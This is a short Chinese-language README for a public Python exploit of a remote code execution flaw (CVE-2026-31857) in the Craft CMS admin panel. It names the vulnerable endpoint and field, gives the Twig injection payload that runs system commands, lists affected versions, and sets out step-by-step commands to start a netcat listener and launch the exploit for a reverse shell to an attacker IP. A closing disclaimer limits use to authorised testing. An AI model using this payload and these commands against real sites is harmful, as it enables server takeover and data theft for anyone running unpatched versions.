针对 Craft CMS 管理面板中 RCE 漏洞的 Python 漏洞利用程序,通过 admin/actions/element-indexes/count-elements 端点触发。
注入通过 RelatedToConditionRule 条件的 elementIds 字段进行,该字段在服务端被解释为 Twig,并通过 system 过滤器滥用执行任意命令({{[['<cmd>']|filter('system')]}})。
漏洞由 NeoSprings 披露
受影响版本:
>= 5.0.0-RC1, <= 5.9.8>= 4.0.0-beta.1, <= 4.17.3参考:
$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt
$ nc -lvnp <attacker_port>
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>
本工具仅供教育目的和授权演练使用(CTF、合同渗透测试或本地测试)。 未经明确授权对任何系统使用本工具均属违法行为。